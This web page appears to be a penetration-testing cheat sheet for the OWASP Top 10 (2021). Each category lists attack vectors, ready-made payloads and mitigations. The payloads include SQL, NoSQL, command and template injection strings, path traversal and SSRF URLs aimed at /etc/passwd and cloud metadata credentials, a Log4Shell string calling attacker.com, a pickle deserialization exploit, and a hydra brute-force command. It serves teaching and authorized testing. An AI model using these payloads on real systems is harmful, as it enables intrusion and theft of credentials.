← All cheat sheets

OWASP-TOP10

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Reference for penetration testers covering each OWASP Top 10 category
with attack vectors, example payloads, and mitigations.

A01:2021 - BROKEN ACCESS CONTROL#

Description:
  Restrictions on authenticated users are not properly enforced.
  Attackers can access unauthorized functions or data.

Common Attack Vectors:
  - IDOR (Insecure Direct Object Reference)
  - Path traversal to access restricted files
  - Privilege escalation via parameter tampering
  - Forced browsing to admin panels
  - CORS misconfiguration allowing unauthorized API access
  - JWT token manipulation (changing role claims)

Example Payloads:
  # IDOR - change user ID in API request
  GET /api/users/1001/profile  ->  GET /api/users/1002/profile

  # Forced browsing
  /admin, /admin/dashboard, /management, /console

  # Parameter tampering
  POST /updateRole  {"userId":"1001","role":"admin"}

  # Path traversal
  GET /files?name=../../../../etc/passwd

  # CORS test
  curl -H "Origin: https://evil.com" -v https://target.com/api/data

Mitigation:
  - Implement server-side access control checks on every request
  - Deny by default, use allowlists
  - Use indirect object references (UUIDs instead of sequential IDs)
  - Rate limit API and controller access
  - Disable directory listing, remove metadata files (.git, .svn)

A02:2021 - CRYPTOGRAPHIC FAILURES#

Description:
  Sensitive data exposure due to weak or missing cryptography.
  Previously known as "Sensitive Data Exposure."

Common Attack Vectors:
  - Cleartext data transmission (HTTP instead of HTTPS)
  - Weak or deprecated algorithms (MD5, SHA1, DES, RC4)
  - Hardcoded encryption keys or secrets in source code
  - Missing encryption at rest for sensitive data
  - Weak TLS configuration (SSLv3, TLS 1.0/1.1)

Example Payloads:
  # Check for weak TLS
  nmap --script ssl-enum-ciphers -p 443 target.com
  sslscan target.com
  testssl.sh target.com

  # Search for hardcoded secrets in JS
  grep -rn "apiKey\|secret\|password\|token" *.js

  # Check for HTTP transmission of sensitive data
  # Intercept login forms submitting over HTTP

  # Padding oracle attack
  padbuster https://target.com/login <encrypted_cookie> 8

Mitigation:
  - Enforce TLS 1.2+ with strong cipher suites
  - Encrypt all sensitive data at rest and in transit
  - Use bcrypt/scrypt/argon2 for password hashing
  - Rotate encryption keys regularly
  - Do not store sensitive data unnecessarily

A03:2021 - INJECTION#

Description:
  Untrusted data is sent to an interpreter as part of a command or query.
  Includes SQL, NoSQL, OS command, LDAP, and XPath injection.

Common Attack Vectors:
  - SQL injection (classic, blind, time-based, UNION-based)
  - NoSQL injection (MongoDB operator injection)
  - OS command injection
  - LDAP injection
  - Template injection (SSTI)

Example Payloads:
  # SQL injection
  ' OR 1=1--
  ' UNION SELECT username,password FROM users--
  ' AND (SELECT SLEEP(5))--
  admin'--

  # NoSQL injection (MongoDB)
  {"username": {"$gt": ""}, "password": {"$gt": ""}}
  {"username": {"$regex": "^admin"}, "password": {"$ne": ""}}

  # OS command injection
  ; ls -la
  | cat /etc/passwd
  $(whoami)
  `id`

  # SSTI (Jinja2)
  {{7*7}}
  {{config.items()}}
  {{''.__class__.__mro__[1].__subclasses__()}}

  # LDAP injection
  *)(uid=*))(|(uid=*

Mitigation:
  - Use parameterized queries / prepared statements
  - Use ORM frameworks properly
  - Input validation with allowlists
  - Escape special characters for the specific interpreter
  - Least privilege database accounts

A04:2021 - INSECURE DESIGN#

Description:
  Flaws in design and architecture. Missing or ineffective security
  controls that should have been designed in from the start.

Common Attack Vectors:
  - Business logic flaws (negative quantities, race conditions)
  - Missing rate limiting on sensitive operations
  - Insecure password recovery flows
  - Lack of multi-factor authentication on critical functions
  - Trust boundary violations

Example Payloads:
  # Business logic - negative price
  POST /purchase {"item":"widget","quantity":-1,"price":50.00}

  # Race condition
  # Send 50 concurrent requests to redeem a coupon
  for i in $(seq 1 50); do
    curl -s -X POST https://target.com/redeem -d "code=GIFT50" &
  done

  # Password reset abuse
  # Enumerate users via different error messages
  POST /reset {"email":"exists@target.com"}    -> "Reset email sent"
  POST /reset {"email":"noexist@target.com"}   -> "User not found"

Mitigation:
  - Threat modeling during design phase
  - Secure design patterns and reference architectures
  - Rate limiting and anti-automation controls
  - Unit and integration tests for abuse cases
  - Plausibility checks on business logic

A05:2021 - SECURITY MISCONFIGURATION#

Description:
  Missing or insecure configuration at any level of the application
  stack (platform, web server, framework, cloud services).

Common Attack Vectors:
  - Default credentials left unchanged
  - Unnecessary features enabled (directory listing, debug mode)
  - Verbose error messages revealing stack traces
  - Missing security headers
  - Cloud storage buckets left public
  - Unpatched software

Example Payloads:
  # Directory listing
  GET /images/ -> directory listing exposed

  # Debug mode
  GET /debug, /console, /actuator, /elmah.axd, /trace.axd

  # Default credentials
  admin:admin, admin:password, tomcat:tomcat, root:toor

  # AWS S3 bucket enumeration
  aws s3 ls s3://target-bucket --no-sign-request

  # Security header check
  curl -I https://target.com | grep -iE "x-frame|x-content|strict|csp"

  # Spring Boot Actuator
  GET /actuator/env
  GET /actuator/heapdump

Mitigation:
  - Automated hardening process for deployments
  - Minimal platform without unnecessary features
  - Review and update configurations regularly
  - Implement security headers (CSP, HSTS, X-Frame-Options)
  - Segmented application architecture

A06:2021 - VULNERABLE AND OUTDATED COMPONENTS#

Description:
  Using components (libraries, frameworks, software) with known
  vulnerabilities or that are unsupported/out of date.

Common Attack Vectors:
  - Exploiting known CVEs in outdated libraries
  - Using components with no security patches
  - Dependency confusion attacks
  - Supply chain attacks via compromised packages

Example Payloads:
  # Identify versions
  Wappalyzer, WhatWeb, BuiltWith
  curl https://target.com | grep -i "jquery\|angular\|react\|bootstrap"

  # Check for known vulnerabilities
  npm audit
  pip-audit
  snyk test
  retire.js

  # Log4Shell (CVE-2021-44228)
  ${jndi:ldap://attacker.com/exploit}

  # Apache Struts RCE
  %{(#cmd='id').(#iswin=...)}

Mitigation:
  - Maintain inventory of all components and versions
  - Subscribe to security advisories
  - Use SCA tools (OWASP Dependency-Check, Snyk, Dependabot)
  - Only obtain components from official sources
  - Remove unused dependencies

A07:2021 - IDENTIFICATION AND AUTHENTICATION FAILURES#

Description:
  Weaknesses in authentication mechanisms allowing credential
  stuffing, brute force, or session hijacking.

Common Attack Vectors:
  - Credential stuffing with breached password lists
  - Brute force attacks on login endpoints
  - Session fixation
  - Weak session tokens
  - Missing MFA on critical functions

Example Payloads:
  # Brute force
  hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form \
    "/login:user=^USER^&pass=^PASS^:Invalid"

  # Session fixation
  # Set session cookie before authentication, check if it persists

  # Credential stuffing
  # Use tools like Burp Intruder with breach databases

  # Default/weak credentials
  admin:admin, admin:123456, test:test

  # Password reset token prediction
  # Capture multiple reset tokens, check for patterns

Mitigation:
  - Implement MFA
  - Rate limit and account lockout after failed attempts
  - Use secure session management (regenerate on login)
  - Check passwords against breach databases (Have I Been Pwned API)
  - Enforce strong password policies

A08:2021 - SOFTWARE AND DATA INTEGRITY FAILURES#

Description:
  Code and infrastructure that does not protect against integrity
  violations. Includes insecure deserialization and CI/CD pipeline
  compromise.

Common Attack Vectors:
  - Insecure deserialization
  - CI/CD pipeline manipulation
  - Auto-update without integrity verification
  - Unsigned or unverified software packages

Example Payloads:
  # Java deserialization (ysoserial)
  java -jar ysoserial.jar CommonsCollections1 "id" | base64

  # PHP object injection
  O:4:"User":2:{s:4:"name";s:5:"admin";s:5:"admin";b:1;}

  # Python pickle deserialization
  import pickle, os
  class Exploit:
      def __reduce__(self):
          return (os.system, ('id',))

  # .NET deserialization
  ysoserial.net -g WindowsIdentity -f Json.Net -c "calc"

Mitigation:
  - Use digital signatures to verify software/data integrity
  - Ensure CI/CD pipelines have proper access control
  - Do not deserialize untrusted data
  - Use integrity checks for all software updates
  - Review code and configuration changes

A09:2021 - SECURITY LOGGING AND MONITORING FAILURES#

Description:
  Insufficient logging, monitoring, and alerting allows attackers
  to operate undetected and persist in systems.

Common Attack Vectors:
  - Log injection to corrupt log files
  - Exploiting lack of monitoring to maintain persistence
  - Covering tracks by clearing logs
  - Pivoting undetected due to missing alerts

Example Payloads:
  # Log injection
  username=admin%0d%0a[2026-03-19 12:00:00] INFO: Admin logged in successfully

  # Log evasion - encode payloads to avoid detection
  # Use base64, URL encoding, or Unicode to bypass log pattern matching

  # Check if logging is present
  # Perform actions and verify if they appear in logs
  # Test: failed logins, access control failures, input validation failures

Mitigation:
  - Log all authentication events, access control failures, input validation
  - Use centralized log management (SIEM)
  - Ensure logs cannot be tampered with
  - Establish effective monitoring and alerting
  - Create incident response and recovery plans

A10:2021 - SERVER-SIDE REQUEST FORGERY (SSRF)#

Description:
  Application fetches a remote resource without validating the
  user-supplied URL, allowing attackers to access internal services.

Common Attack Vectors:
  - Access cloud metadata endpoints
  - Port scanning internal networks
  - Access internal admin panels
  - Read local files via file:// protocol
  - Bypass firewall rules

Example Payloads:
  # AWS metadata
  http://169.254.169.254/latest/meta-data/iam/security-credentials/

  # Internal services
  http://127.0.0.1:8080/admin
  http://localhost:6379/  (Redis)
  http://[::1]:80/

  # DNS rebinding
  # Use a domain that resolves to 127.0.0.1 after TTL expires

  # File access
  file:///etc/passwd
  file:///proc/self/environ

  # IP encoding bypass
  http://0x7f000001/  (hex for 127.0.0.1)
  http://2130706433/  (decimal for 127.0.0.1)
  http://0177.0.0.1/  (octal)

Mitigation:
  - Validate and sanitize all client-supplied URLs
  - Use allowlists for permitted domains/IPs
  - Do not send raw responses to clients
  - Disable HTTP redirections
  - Use network segmentation to limit SSRF impact

QUICK REFERENCE TABLE#

  A01  Broken Access Control         -> Test IDOR, forced browsing, privilege escalation
  A02  Cryptographic Failures        -> Check TLS, hashing, key management
  A03  Injection                     -> SQLi, NoSQLi, CMDi, SSTI
  A04  Insecure Design               -> Business logic, race conditions
  A05  Security Misconfiguration     -> Defaults, debug, headers, cloud
  A06  Vulnerable Components         -> CVE lookup, SCA tools
  A07  Authentication Failures       -> Brute force, session, MFA
  A08  Integrity Failures            -> Deserialization, CI/CD
  A09  Logging/Monitoring Failures   -> Log injection, coverage gaps
  A10  SSRF                          -> Internal access, metadata, DNS rebinding